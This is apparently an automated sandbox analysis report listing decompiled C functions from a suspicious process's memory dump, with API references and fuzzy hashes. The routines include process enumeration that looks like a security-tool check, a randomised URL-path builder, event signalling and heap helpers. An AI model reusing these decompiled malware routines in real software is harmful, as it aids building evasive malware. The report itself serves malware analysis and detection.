                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,052F30E1,?,?,?), ref: 052F748E
                                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,052F30E1,?,?,?), ref: 052F74A6
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 73268831-0
                                • Opcode ID: 2b6d6ec9f1bcb6da51841b4aa7aab30a8c8ee8b48260c61065f5735685baea12
                                • Instruction ID: c7c499378efe472e957ce8b60d6ab3a5a051784195bd46ea15c7a199f9141827
                                • Opcode Fuzzy Hash: 2b6d6ec9f1bcb6da51841b4aa7aab30a8c8ee8b48260c61065f5735685baea12
                                • Instruction Fuzzy Hash: 3021A5326253136BDB215E68BC49B5BFAB9FF44761F090134FF0A9B280DB70D8404750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 39%
                                			E052F3032(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                				intOrPtr _v12;
                                				void* _v16;
                                				void* _v28;
                                				char _v32;
                                				void* __esi;
                                				void* _t29;
                                				void* _t38;
                                				signed int* _t39;
                                				void* _t40;
                                
                                				_t36 = __ecx;
                                				_v32 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v12 = _a4;
                                				_t38 = E052F6710(__ecx,  &_v32);
                                				if(_t38 != 0) {
                                					L12:
                                					_t39 = _a8;
                                					L13:
                                					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                						_t23 =  &(_t39[1]);
                                						if(_t39[1] != 0) {
                                							E052F15B9(_t23);
                                						}
                                					}
                                					return _t38;
                                				}
                                				if(E052F4C8C(0x40,  &_v16) != 0) {
                                					_v16 = 0;
                                				}
                                				_t40 = CreateEventA(0x52fa2f8, 1, 0,  *0x52fa394);
                                				if(_t40 != 0) {
                                					SetEvent(_t40);
                                					Sleep(0xbb8);
                                					CloseHandle(_t40);
                                				}
                                				_push( &_v32);
                                				if(_a12 == 0) {
                                					_t29 = E052F4039(_t36);
                                				} else {
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_t29 = E052F1D57(_t36);
                                				}
                                				_t41 = _v16;
                                				_t38 = _t29;
                                				if(_v16 != 0) {
                                					E052F3C84(_t41);
                                				}
                                				if(_t38 != 0) {
                                					goto L12;
                                				} else {
                                					_t39 = _a8;
                                					_t38 = E052F73C3( &_v32, _t39);
                                					goto L13;
                                				}
                                			}

                                APIs
                                • CreateEventA.KERNEL32(052FA2F8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730,?,?,?,?,052F211B,?,00000001), ref: 052F3083
                                • SetEvent.KERNEL32(00000000,?,?,?,?,052F211B,?,00000001,052F560C,00000002,?,?,052F560C), ref: 052F3090
                                • Sleep.KERNEL32(00000BB8,?,?,?,?,052F211B,?,00000001,052F560C,00000002,?,?,052F560C), ref: 052F309B
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,052F211B,?,00000001,052F560C,00000002,?,?,052F560C), ref: 052F30A2
                                  • Part of subcall function 052F4039: WaitForSingleObject.KERNEL32(00000000,?,?,?,052F30C2,?,052F30C2,?,?,?,?,?,052F30C2,?), ref: 052F4113
                                  • Part of subcall function 052F4039: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,052F30C2,?,?,?,?,?,052F211B,?), ref: 052F413B
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp Download File
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseEvent$CreateHandleObjectSingleSleepWait
                                • String ID:
                                • API String ID: 467273019-0
                                • Opcode ID: 2e9aab7b03218ac64df98b70da5668701e8abd57ebdcbc13d26697331f2b4e23
                                • Instruction ID: 022f5da553c7a30d81e757cecd4e0bf14d672d23a796bbf7a9d912ffec460ee1
                                • Opcode Fuzzy Hash: 2e9aab7b03218ac64df98b70da5668701e8abd57ebdcbc13d26697331f2b4e23
                                • Instruction Fuzzy Hash: 60214472A20115ABCF10EFE4B889DEEF7A9AF54250B05483AFB15A7140DB71998487A1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 78%
                                			E052F4D09(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                				intOrPtr _v8;
                                				void* _v12;
                                				void* _v16;
                                				intOrPtr _t26;
                                				intOrPtr* _t28;
                                				intOrPtr _t31;
                                				intOrPtr* _t32;
                                				void* _t39;
                                				int _t46;
                                				intOrPtr* _t47;
                                				int _t48;
                                
                                				_t47 = __eax;
                                				_push( &_v12);
                                				_push(__eax);
                                				_t39 = 0;
                                				_t46 = 0;
                                				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                				_v8 = _t26;
                                				if(_t26 < 0) {
                                					L13:
                                					return _v8;
                                				}
                                				if(_v12 == 0) {
                                					Sleep(0xc8);
                                					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                				}
                                				if(_v8 >= _t39) {
                                					_t28 = _v12;
                                					if(_t28 != 0) {
                                						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                						_v8 = _t31;
                                						if(_t31 >= 0) {
                                							_t46 = lstrlenW(_v16);
                                							if(_t46 != 0) {
                                								_t46 = _t46 + 1;
                                								_t48 = _t46 + _t46;
                                								_t39 = E052F6837(_t48);
                                								if(_t39 == 0) {
                                									_v8 = 0x8007000e;
                                								} else {
                                									memcpy(_t39, _v16, _t48);
                                								}
                                								__imp__#6(_v16);
                                							}
                                						}
                                						_t32 = _v12;
                                						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                					}
                                					 *_a4 = _t39;
                                					 *_a8 = _t46 + _t46;
                                				}
                                				goto L13;
                                			}

                                APIs
                                • Sleep.KERNEL32(000000C8), ref: 052F4D37
                                • lstrlenW.KERNEL32(?), ref: 052F4D6D
                                • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 052F4D8E
                                • SysFreeString.OLEAUT32(?), ref: 052F4DA2
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: FreeSleepStringlstrlenmemcpy
                                • String ID:
                                • API String ID: 1198164300-0
                                • Opcode ID: 6faf4de66465fb760d1520fc58b1a19e771b6c8b8cee7218c4677c0f4947bb42
                                • Instruction ID: 1ff0f7802c2ac33fe4b52bb3e688f0cca3dfda753240190237844a1908695a32
                                • Opcode Fuzzy Hash: 6faf4de66465fb760d1520fc58b1a19e771b6c8b8cee7218c4677c0f4947bb42
                                • Instruction Fuzzy Hash: 7F213E75A10219FFCF10EFA8E88899EBBB9FF48211B104179F906D7210EB709A45CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E052F52E5(unsigned int __eax, void* __ecx) {
                                				void* _v8;
                                				void* _v12;
                                				signed int _t21;
                                				signed short _t23;
                                				char* _t27;
                                				void* _t29;
                                				void* _t30;
                                				unsigned int _t33;
                                				void* _t37;
                                				unsigned int _t38;
                                				void* _t41;
                                				void* _t42;
                                				int _t45;
                                				void* _t46;
                                
                                				_t42 = __eax;
                                				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                				_t38 = __eax;
                                				_t30 = RtlAllocateHeap( *0x52fa290, 0, (__eax >> 3) + __eax + 1);
                                				_v12 = _t30;
                                				if(_t30 != 0) {
                                					_v8 = _t42;
                                					do {
                                						_t33 = 0x18;
                                						if(_t38 <= _t33) {
                                							_t33 = _t38;
                                						}
                                						_t21 =  *0x52fa2a8; // 0x0
                                						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                						 *0x52fa2a8 = _t23;
                                						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                						memcpy(_t30, _v8, _t45);
                                						_v8 = _v8 + _t45;
                                						_t27 = _t30 + _t45;
                                						_t38 = _t38 - _t45;
                                						_t46 = _t46 + 0xc;
                                						 *_t27 = 0x2f;
                                						_t13 = _t27 + 1; // 0x1
                                						_t30 = _t13;
                                					} while (_t38 > 8);
                                					memcpy(_t30, _v8, _t38 + 1);
                                				}
                                				return _v12;
                                			}

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,052F62E0,00000000,?,00000000,052F70D9,00000000,07459630), ref: 052F52F0
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 052F5308
                                • memcpy.NTDLL(00000000,07459630,-00000008,?,?,?,052F62E0,00000000,?,00000000,052F70D9,00000000,07459630), ref: 052F534C
                                • memcpy.NTDLL(00000001,07459630,00000001,052F70D9,00000000,07459630), ref: 052F536D
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: 08e7699ce2c0eaceb7bce9c7bbb9a4486c67d82f84e94fe599c3b225bfb3831b
                                • Instruction ID: 703696dc6d53c45c2f37eac7d11525163910f1c6c592ba62c1d703bcb2880abe
                                • Opcode Fuzzy Hash: 08e7699ce2c0eaceb7bce9c7bbb9a4486c67d82f84e94fe599c3b225bfb3831b
                                • Instruction Fuzzy Hash: 62110A72B141157FD7148B69FC89E5EBFBDEF80260B040176F50997190EA7099408790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 53%
                                			E052F578C(char* __eax) {
                                				char* _t8;
                                				intOrPtr _t12;
                                				char* _t21;
                                				signed int _t23;
                                				char* _t24;
                                				signed int _t26;
                                				void* _t27;
                                
                                				_t21 = __eax;
                                				_push(0x20);
                                				_t23 = 1;
                                				_push(__eax);
                                				while(1) {
                                					_t8 = StrChrA();
                                					if(_t8 == 0) {
                                						break;
                                					}
                                					_t23 = _t23 + 1;
                                					_push(0x20);
                                					_push( &(_t8[1]));
                                				}
                                				_t12 = E052F6837(_t23 << 2);
                                				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                				if(_t12 != 0) {
                                					StrTrimA(_t21, 0x52f92a4);
                                					_t26 = 0;
                                					do {
                                						_t24 = StrChrA(_t21, 0x20);
                                						if(_t24 != 0) {
                                							 *_t24 = 0;
                                							_t24 =  &(_t24[1]);
                                							StrTrimA(_t24, 0x52f92a4);
                                						}
                                						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                						_t26 = _t26 + 1;
                                						_t21 = _t24;
                                					} while (_t24 != 0);
                                					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                				}
                                				return 0;
                                			}

                                APIs
                                • StrChrA.SHLWAPI(?,00000020,00000000,0745962C,?,?,?,052F1128,0745962C,?,?,052F55D3), ref: 052F57A6
                                • StrTrimA.SHLWAPI(?,052F92A4,00000002,?,?,?,052F1128,0745962C,?,?,052F55D3), ref: 052F57C5
                                • StrChrA.SHLWAPI(?,00000020,?,?,?,052F1128,0745962C,?,?,052F55D3,?,?,?,?,?,052F6BD8), ref: 052F57D0
                                • StrTrimA.SHLWAPI(00000001,052F92A4,?,?,?,052F1128,0745962C,?,?,052F55D3,?,?,?,?,?,052F6BD8), ref: 052F57E2
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Trim
                                • String ID:
                                • API String ID: 3043112668-0
                                • Opcode ID: 4bd396298a86430216eff3b488721b2d1028080c4ccfbe9b2ed15734fa7a7391
                                • Instruction ID: 35b7f97a405dd5dd0cd02685a7b94a6bb9cdf25ad9402d037239407da2dad33d
                                • Opcode Fuzzy Hash: 4bd396298a86430216eff3b488721b2d1028080c4ccfbe9b2ed15734fa7a7391
                                • Instruction Fuzzy Hash: 7D0152717253129FD3218B55BC4AF2BFE99FF86A60F120529FA45D7240DBA1C80187A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E052F513E() {
                                				char _v264;
                                				void* _v300;
                                				int _t8;
                                				intOrPtr _t9;
                                				int _t15;
                                				void* _t17;
                                
                                				_t15 = 0;
                                				_t17 = CreateToolhelp32Snapshot(2, 0);
                                				if(_t17 != 0) {
                                					_t8 = Process32First(_t17,  &_v300);
                                					while(_t8 != 0) {
                                						_t9 =  *0x52fa2d4; // 0x215d5a8
                                						_t2 = _t9 + 0x52fbdd4; // 0x73617661
                                						_push( &_v264);
                                						if( *0x52fa118() != 0) {
                                							_t15 = 1;
                                						} else {
                                							_t8 = Process32Next(_t17,  &_v300);
                                							continue;
                                						}
                                						L7:
                                						CloseHandle(_t17);
                                						goto L8;
                                					}
                                					goto L7;
                                				}
                                				L8:
                                				return _t15;
                                			}

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 052F514E
                                • Process32First.KERNEL32(00000000,?), ref: 052F5161
                                • Process32Next.KERNEL32(00000000,?), ref: 052F518D
                                • CloseHandle.KERNEL32(00000000), ref: 052F519C
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 6155540a82153a747ec83742b9200bddea84b6d279c846256ae9f918e89d6f18
                                • Instruction ID: 758ab3a06a71217f2d4579a2fff9f8a09fafa6b5f8b05fcfd7853807d55afb8a
                                • Opcode Fuzzy Hash: 6155540a82153a747ec83742b9200bddea84b6d279c846256ae9f918e89d6f18
                                • Instruction Fuzzy Hash: D5F0BB323211256AD720E666BC4DEEBB7ADDFC5210F010171FB4AC2040FB34A9868BA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E052F5076() {
                                				void* _t1;
                                				intOrPtr _t5;
                                				void* _t6;
                                				void* _t7;
                                				void* _t11;
                                
                                				_t1 =  *0x52fa2c4; // 0x30c
                                				if(_t1 == 0) {
                                					L8:
                                					return 0;
                                				}
                                				SetEvent(_t1);
                                				_t11 = 0x7fffffff;
                                				while(1) {
                                					SleepEx(0x64, 1);
                                					_t5 =  *0x52fa308; // 0x0
                                					if(_t5 == 0) {
                                						break;
                                					}
                                					_t11 = _t11 - 0x64;
                                					if(_t11 > 0) {
                                						continue;
                                					}
                                					break;
                                				}
                                				_t6 =  *0x52fa2c4; // 0x30c
                                				if(_t6 != 0) {
                                					CloseHandle(_t6);
                                				}
                                				_t7 =  *0x52fa290; // 0x7060000
                                				if(_t7 != 0) {
                                					HeapDestroy(_t7);
                                				}
                                				goto L8;
                                			}

                                APIs
                                • SetEvent.KERNEL32(0000030C,00000001,052F56C9), ref: 052F5081
                                • SleepEx.KERNEL32(00000064,00000001), ref: 052F5090
                                • CloseHandle.KERNEL32(0000030C), ref: 052F50B1
                                • HeapDestroy.KERNEL32(07060000), ref: 052F50C1
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: CloseDestroyEventHandleHeapSleep
                                • String ID:
                                • API String ID: 4109453060-0
                                • Opcode ID: 045a5331579e647195020b2e715a5345b254c951bdaab93409063079021e8ecd
                                • Instruction ID: d9de0b71dc4318bf27b42b49887692666ae37c1e9fdacb2c5e10f3b17fba5e8a
                                • Opcode Fuzzy Hash: 045a5331579e647195020b2e715a5345b254c951bdaab93409063079021e8ecd
                                • Instruction Fuzzy Hash: A0F0AC71B353129BDA205A75B94EF5A7BA8BF09B71B040538BD09D76C0DF25D4848B90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 50%
                                			E052F10DD(void** __esi) {
                                				char* _v0;
                                				intOrPtr _t4;
                                				intOrPtr _t6;
                                				void* _t8;
                                				intOrPtr _t11;
                                				void* _t12;
                                				void** _t14;
                                
                                				_t14 = __esi;
                                				_t4 =  *0x52fa37c; // 0x7459630
                                				__imp__(_t4 + 0x40);
                                				while(1) {
                                					_t6 =  *0x52fa37c; // 0x7459630
                                					_t1 = _t6 + 0x58; // 0x0
                                					if( *_t1 == 0) {
                                						break;
                                					}
                                					Sleep(0xa);
                                				}
                                				_t8 =  *_t14;
                                				if(_t8 != 0 && _t8 != 0x52fa030) {
                                					HeapFree( *0x52fa290, 0, _t8);
                                				}
                                				_t14[1] = E052F578C(_v0, _t14);
                                				_t11 =  *0x52fa37c; // 0x7459630
                                				_t12 = _t11 + 0x40;
                                				__imp__(_t12);
                                				return _t12;
                                			}

                                APIs
                                • RtlEnterCriticalSection.NTDLL(074595F0), ref: 052F10E6
                                • Sleep.KERNEL32(0000000A,?,?,052F55D3,?,?,?,?,?,052F6BD8,?,00000001), ref: 052F10F0
                                • HeapFree.KERNEL32(00000000,00000000,?,?,052F55D3,?,?,?,?,?,052F6BD8,?,00000001), ref: 052F1118
                                • RtlLeaveCriticalSection.NTDLL(074595F0), ref: 052F1134
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: de0e21ad6e4ddfbada0bd81b2581a7376fd9dc405486e056537f07c5c2dd4961
                                • Instruction ID: cf45a59cb9d6e4a734eb6c1f15241c8f10fe136eeadc9662b7ed3839a5d243c8
                                • Opcode Fuzzy Hash: de0e21ad6e4ddfbada0bd81b2581a7376fd9dc405486e056537f07c5c2dd4961
                                • Instruction Fuzzy Hash: D5F05E70334241DFE7248F68F84EF1ABBA8BF04710B008038FA4AD7290CB20D890DB25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E052F50DF() {
                                				void* _v0;
                                				void** _t3;
                                				void** _t5;
                                				void** _t7;
                                				void** _t8;
                                				void* _t10;
                                
                                				_t3 =  *0x52fa37c; // 0x7459630
                                				__imp__( &(_t3[0x10]));
                                				while(1) {
                                					_t5 =  *0x52fa37c; // 0x7459630
                                					_t1 =  &(_t5[0x16]); // 0x0
                                					if( *_t1 == 0) {
                                						break;
                                					}
                                					Sleep(0xa);
                                				}
                                				_t7 =  *0x52fa37c; // 0x7459630
                                				_t10 =  *_t7;
                                				if(_t10 != 0 && _t10 != 0x52fb83e) {
                                					HeapFree( *0x52fa290, 0, _t10);
                                					_t7 =  *0x52fa37c; // 0x7459630
                                				}
                                				 *_t7 = _v0;
                                				_t8 =  &(_t7[0x10]);
                                				__imp__(_t8);
                                				return _t8;
                                			}










                                APIs
                                • RtlEnterCriticalSection.NTDLL(074595F0), ref: 052F50E8
                                • Sleep.KERNEL32(0000000A,?,?,052F55D3,?,?,?,?,?,052F6BD8,?,00000001), ref: 052F50F2
                                • HeapFree.KERNEL32(00000000,?,?,?,052F55D3,?,?,?,?,?,052F6BD8,?,00000001), ref: 052F5120
                                • RtlLeaveCriticalSection.NTDLL(074595F0), ref: 052F5135
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: 07ec039becc2c7842342f4dbf4e1d7701ab01af6c4231063c92cef96999b25d7
                                • Instruction ID: 862de234ec6752e4c3076d8bd145d7a396aedf9ab82aef99cf8661f65ace9c0a
                                • Opcode Fuzzy Hash: 07ec039becc2c7842342f4dbf4e1d7701ab01af6c4231063c92cef96999b25d7
                                • Instruction Fuzzy Hash: 64F0DA74324201DFE7189B24F85EF267BA5FF48721B044038FA0A87790CB30A840DB24
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E052F3D98(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                				intOrPtr* _v8;
                                				void* _t17;
                                				intOrPtr* _t22;
                                				void* _t27;
                                				char* _t30;
                                				void* _t33;
                                				void* _t34;
                                				void* _t36;
                                				void* _t37;
                                				void* _t39;
                                				int _t42;
                                
                                				_t17 = __eax;
                                				_t37 = 0;
                                				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                				_t2 = _t17 + 1; // 0x1
                                				_t28 = _t2;
                                				_t34 = E052F6837(_t2);
                                				if(_t34 != 0) {
                                					_t30 = E052F6837(_t28);
                                					if(_t30 == 0) {
                                						E052F50CA(_t34);
                                					} else {
                                						_t39 = _a4;
                                						_t22 = E052F77DD(_t39);
                                						_v8 = _t22;
                                						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                							_a4 = _t39;
                                						} else {
                                							_t26 = _t22 + 2;
                                							_a4 = _t22 + 2;
                                							_t22 = E052F77DD(_t26);
                                							_v8 = _t22;
                                						}
                                						if(_t22 == 0) {
                                							__imp__(_t34, _a4);
                                							 *_t30 = 0x2f;
                                							 *((char*)(_t30 + 1)) = 0;
                                						} else {
                                							_t42 = _t22 - _a4;
                                							memcpy(_t34, _a4, _t42);
                                							 *((char*)(_t34 + _t42)) = 0;
                                							__imp__(_t30, _v8);
                                						}
                                						 *_a8 = _t34;
                                						_t37 = 1;
                                						 *_a12 = _t30;
                                					}
                                				}
                                				return _t37;
                                			}















                                APIs
                                • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,052F3CEE,00000000,00000000,00000000,07459698,?,?,052F106E,?,07459698), ref: 052F3DA4
                                  • Part of subcall function 052F6837: RtlAllocateHeap.NTDLL(00000000,00000000,052F4197), ref: 052F6843
                                  • Part of subcall function 052F77DD: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,052F3DD2,00000000,00000001,00000001,?,?,052F3CEE,00000000,00000000,00000000,07459698), ref: 052F77EB
                                  • Part of subcall function 052F77DD: StrChrA.SHLWAPI(?,0000003F,?,?,052F3CEE,00000000,00000000,00000000,07459698,?,?,052F106E,?,07459698,0000EA60,?), ref: 052F77F5
                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,052F3CEE,00000000,00000000,00000000,07459698,?,?,052F106E), ref: 052F3E02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 052F3E12
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 052F3E1E
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                • String ID:
                                • API String ID: 3767559652-0
                                • Opcode ID: 237af3fa7d6e77582582ac554ae59d26eae9c923af01945e15eedccc57d38d39
                                • Instruction ID: 22a7d8516e8e0515f5ed4fe92f0e2caab7b5b3696c674cab6f2182a96afed99e
                                • Opcode Fuzzy Hash: 237af3fa7d6e77582582ac554ae59d26eae9c923af01945e15eedccc57d38d39
                                • Instruction Fuzzy Hash: A321A272624256ABCB129F74E888EAEFFB9EF19250B044475FE099B201D730D941C7A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E052F5D37(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                				void* _v8;
                                				void* _t18;
                                				int _t25;
                                				int _t29;
                                				int _t34;
                                
                                				_t29 = lstrlenW(_a4);
                                				_t25 = lstrlenW(_a8);
                                				_t18 = E052F6837(_t25 + _t29 + _t25 + _t29 + 2);
                                				_v8 = _t18;
                                				if(_t18 != 0) {
                                					_t34 = _t29 + _t29;
                                					memcpy(_t18, _a4, _t34);
                                					_t10 = _t25 + 2; // 0x2
                                					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                				}
                                				return _v8;
                                			}









                                APIs
                                • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,074592FC,?,052F1B37,004F0053,074592FC,?,?,?,?,?,?,052F20B0), ref: 052F5D47
                                • lstrlenW.KERNEL32(052F1B37,?,052F1B37,004F0053,074592FC,?,?,?,?,?,?,052F20B0), ref: 052F5D4E
                                  • Part of subcall function 052F6837: RtlAllocateHeap.NTDLL(00000000,00000000,052F4197), ref: 052F6843
                                • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,052F1B37,004F0053,074592FC,?,?,?,?,?,?,052F20B0), ref: 052F5D6E
                                • memcpy.NTDLL(751469A0,052F1B37,00000002,00000000,004F0053,751469A0,?,?,052F1B37,004F0053,074592FC), ref: 052F5D81
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrlenmemcpy$AllocateHeap
                                • String ID:
                                • API String ID: 2411391700-0
                                • Opcode ID: ecce23ca3c757c68509e15a466c7524e6b28da36978e2497d24b9ee68726f1b6
                                • Instruction ID: 7d16b0ea28704b29085e2f3c27512ace4c91ccacccc446aec1758fcb7346a4d5
                                • Opcode Fuzzy Hash: ecce23ca3c757c68509e15a466c7524e6b28da36978e2497d24b9ee68726f1b6
                                • Instruction Fuzzy Hash: 0CF0FF76A10118BBCF11DFA9DC89CDEBBACEF092547154066FA08D7101E735EA149BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(074587FA,00000000,00000000,00000000,052F7100,00000000), ref: 052F21D1
                                • lstrlen.KERNEL32(?), ref: 052F21D9
                                  • Part of subcall function 052F6837: RtlAllocateHeap.NTDLL(00000000,00000000,052F4197), ref: 052F6843
                                • lstrcpy.KERNEL32(00000000,074587FA), ref: 052F21ED
                                • lstrcat.KERNEL32(00000000,?), ref: 052F21F8
